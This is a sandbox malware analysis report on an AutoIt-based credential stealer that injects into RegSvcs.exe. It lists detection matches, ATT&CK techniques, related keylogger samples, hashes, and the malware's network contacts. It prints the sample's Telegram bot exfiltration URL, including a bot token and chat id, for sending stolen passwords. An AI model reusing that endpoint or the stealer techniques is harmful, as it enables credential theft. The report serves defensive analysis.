              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
Source: Yara match; File source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\njVvgA8pEB.exe; Code function: 0_2_00386283 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\njVvgA8pEB.exe; Code function: 0_2_00386747 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK matrix (techniques matched by signatures carry their signature count in parentheses; the others are unmatched placeholders of the matrix):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Native API (2), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading (1), Valid Accounts (2), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (212), RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (11), Access Token Manipulation (21), Process Injection (212), HTML Smuggling, Dynamic API Resolution
Credential Access: OS Credential Dumping (1), Input Capture (21), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (1), System Information Discovery (137), Security Software Discovery (251), Virtualization/Sandbox Evasion (11), Process Discovery (2), Application Window Discovery (11), System Owner/User Discovery (1), System Network Configuration Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3), GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Web Service (1), Ingress Tool Transfer (2), Encrypted Channel (11), Non-Application Layer Protocol (3), Application Layer Protocol (14), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph (ID: 1588596; Sample: njVvgA8pEB.exe; Start date: 11/01/2025; Architecture: WINDOWS; Score: 100)

Start
• DNS/IP: reallyfreegeoip.org; api.telegram.org; 2 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
• Signature on reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
• Signature on api.telegram.org: Uses the Telegram API (likely for C&C communication)
• Started: njVvgA8pEB.exe (2)

njVvgA8pEB.exe (2)
• Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Switches to a custom stack to bypass stack traces
• Started: njVvgA8pEB.exe (1); RegSvcs.exe

njVvgA8pEB.exe (1)
• Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
• Started: RegSvcs.exe (15 2)

RegSvcs.exe (15 2)
• DNS/IP: api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom; checkip.dyndns.com 158.101.44.242, 49730, 80 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.16.1, 443, 49731 CLOUDFLARENETUS United States
• Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
njVvgA8pEB.exe | 61% | Virustotal |
njVvgA8pEB.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject
njVvgA8pEB.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://crl.microsXWx | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.16.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 158.101.44.242 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.microsXWx | RegSvcs.exe, 00000003.00000002.4189028635.0000000005882000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp | false | | high
http://reallyfreegeoip.org | RegSvcs.exe, 00000003.00000002.4187157369.000000000339D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437 | RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.4187157369.0000000003370000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.4187157369.00000000032F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot-/sendDocument?chat_id= | RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.16.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1588596
                                                    Start date and time:2025-01-11 02:54:22 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 49s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:njVvgA8pEB.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@3/3
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 88%
                                                    • Number of executed functions: 53
                                                    • Number of non-executed functions: 284
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:55:27 | API Interceptor | 10203833x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | TjoY7n65om.exe | malicious | Snake Keylogger |
149.154.167.220 | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | cOH7jKmo25.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
104.21.16.1 | NFhRxwbegd.exe | malicious | FormBook | www.kkpmoneysocial.top/86am/
104.21.16.1 | JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
158.101.44.242 | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
158.101.44.242 | VCU262Y2QB.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | WGi85dsMNp.exe | malicious | GuLoader | checkip.dyndns.org/
158.101.44.242 | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | vnV17JImCH.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | PK5pHX4Gu5.exe | malicious | MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | SABXJ1B5c8.exe | malicious | MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | 4UQ5wnI389.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | jxy62Zm6c4.exe | malicious | MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | rwlPT9YJt0.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | uVpytXGpQz.exe | malicious | Snake Keylogger | 132.226.8.169
checkip.dyndns.com | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
checkip.dyndns.com | VCU262Y2QB.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
checkip.dyndns.com | 4AMVusDMPP.exe | malicious | GuLoader | 193.122.130.0
reallyfreegeoip.org | rwlPT9YJt0.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.16.1
reallyfreegeoip.org | uVpytXGpQz.exe | malicious | Snake Keylogger | 104.21.64.1
reallyfreegeoip.org | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
reallyfreegeoip.org | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.48.1
reallyfreegeoip.org | h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.112.1
reallyfreegeoip.org | VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.16.1
api.telegram.org | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | TjoY7n65om.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | cOH7jKmo25.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | 3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: TELEGRAMRU
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
  TjoY7n65om.exe | malicious | Snake Keylogger | 149.154.167.220
  Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  WGi85dsMNp.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  cOH7jKmo25.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
  3i1gMM8K4z.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Match: CLOUDFLARENETUS
  AxKxwW9WGa.exe | malicious | FormBook | 172.67.186.192
  k9OEsV37GE.exe | malicious | FormBook | 104.21.96.1
  rwlPT9YJt0.exe | malicious | Snake Keylogger | 104.21.80.1
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.16.1
  XeFYBYYj0w.exe | malicious | FormBook | 188.114.96.3
  tfWjjV1LdT.exe | malicious | FormBook | 104.21.36.62
  uVpytXGpQz.exe | malicious | Snake Keylogger | 104.21.64.1
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.32.1
Match: ORACLE-BMC-31898US
  rwlPT9YJt0.exe | malicious | Snake Keylogger | 193.122.130.0
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
  VCU262Y2QB.exe | malicious | Snake Keylogger | 193.122.130.0
  h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.130.0
  yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
  4AMVusDMPP.exe | malicious | GuLoader | 193.122.130.0
  VCU262Y2QB.exe | malicious | Snake Keylogger | 158.101.44.242
  h1HIe1rt4D.exe | malicious | Snake Keylogger | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  rwlPT9YJt0.exe | malicious | Snake Keylogger | 104.21.16.1
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.16.1
  uVpytXGpQz.exe | malicious | Snake Keylogger | 104.21.16.1
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 104.21.16.1
  VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.16.1
  h1HIe1rt4D.exe | malicious | Snake Keylogger | 104.21.16.1
  yqfze5TKW7.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.16.1
  VCU262Y2QB.exe | malicious | Snake Keylogger | 104.21.16.1
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  KtPCqWWnqM.exe | malicious | Unknown | 149.154.167.220
  YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  KtPCqWWnqM.exe | malicious | Unknown | 149.154.167.220
  ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
  ukBQ4ch2nE.exe | malicious | AgentTesla | 149.154.167.220
  JGvCEaqruI.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
  J4CcLMNm55.exe | malicious | Unknown | 149.154.167.220
  J4CcLMNm55.exe | malicious | Unknown | 149.154.167.220
No context
Process: C:\Users\user\Desktop\njVvgA8pEB.exe
File Type: data
Category: dropped
Size (bytes): 209408
Entropy (8bit): 7.796469735926368
Encrypted: false
SSDEEP: 6144:oSZvr+4W4wDeSz+5qon1swbIni0l0Cs4PyvUre:omj+t1DeSz+7n11bii0c4YOe
MD5: EAE09EA8F9F911C9A80028FD21B2481B
SHA1: 9F05D89C56816F1664E5149E11A319A672BE2462
SHA-256: B8CE763CE8055A3D490043F66DCEE6148AEB9A5392CBF7CFF70B171FC43C32B8
SHA-512: C699C5468BB768F4E9C72047CB0A27654547B1A7F8F6797E5573D7DF0DE5680CC297AE7AB4D18F05C0CA9B675CDE15BEFA784CB4E287751D5F20D99AA49A0B3F
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\njVvgA8pEB.exe
File Type: data
Category: dropped
Size (bytes): 195396
Entropy (8bit): 7.981144573693196
Encrypted: false
SSDEEP: 3072:SSiSck4DEAGgYdvNIYHOCEwIfCz5tmgZyXUV5KQWEfFfLnZtZFM5B61w4p5Ub0ut:ShfDEAGgYdvWkOC0fM5Ig6UuwnNFMvhJ
MD5: 8277119BAEECDBFC1409935EA2642F9D
SHA1: D80D86491DADE16AF764779A4B975ACB38C9E6E6
SHA-256: 4B1F8C21DBC199F122A0D63AFC192368F9E6390347EC7C9DDE6DE4A8A81F44DD
SHA-512: 49128760D706E7DCDAD769BD2A557C46584AA805CE5A8665850DE0DED9061435C9766833B140CD1248A65DC47E7C1AE02943B373E5E0339F3CE48EE4374CBC98
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\njVvgA8pEB.exe
File Type: data
Category: dropped
Size (bytes): 195396
Entropy (8bit): 7.981144573693196
Encrypted: false
SSDEEP: 3072:SSiSck4DEAGgYdvNIYHOCEwIfCz5tmgZyXUV5KQWEfFfLnZtZFM5B61w4p5Ub0ut:ShfDEAGgYdvWkOC0fM5Ig6UuwnNFMvhJ
MD5: 8277119BAEECDBFC1409935EA2642F9D
SHA1: D80D86491DADE16AF764779A4B975ACB38C9E6E6
SHA-256: 4B1F8C21DBC199F122A0D63AFC192368F9E6390347EC7C9DDE6DE4A8A81F44DD
SHA-512: 49128760D706E7DCDAD769BD2A557C46584AA805CE5A8665850DE0DED9061435C9766833B140CD1248A65DC47E7C1AE02943B373E5E0339F3CE48EE4374CBC98
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.087555999620431
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: njVvgA8pEB.exe
File size: 1'118'720 bytes
MD5: d689d0763faaa679d5df32a3c14f9708
SHA1: 928a1e168d684e9a1179d6c023e52cb33da1c26b
SHA256: d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c
SHA512: 71d6c572fb1edbca45a8864e51bbb48ca5e98fd66a002b7437efa66a3bc67d583bb99a433e37a054e92d121f556019ad2a81d6c49e72094be7d993c0e36a2e05
SSDEEP: 24576:lu6J33O0c+JY5UZ+XC0kGso6Fa0iaRxkjVelX0/DwU3AuWY:nu0c++OCvkGs9Fa0tYk09oY
TLSH: 5535BE2273DDC360CB669173BF2AB7016EBF3C614630B95B1F980D7DA950162262D7A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
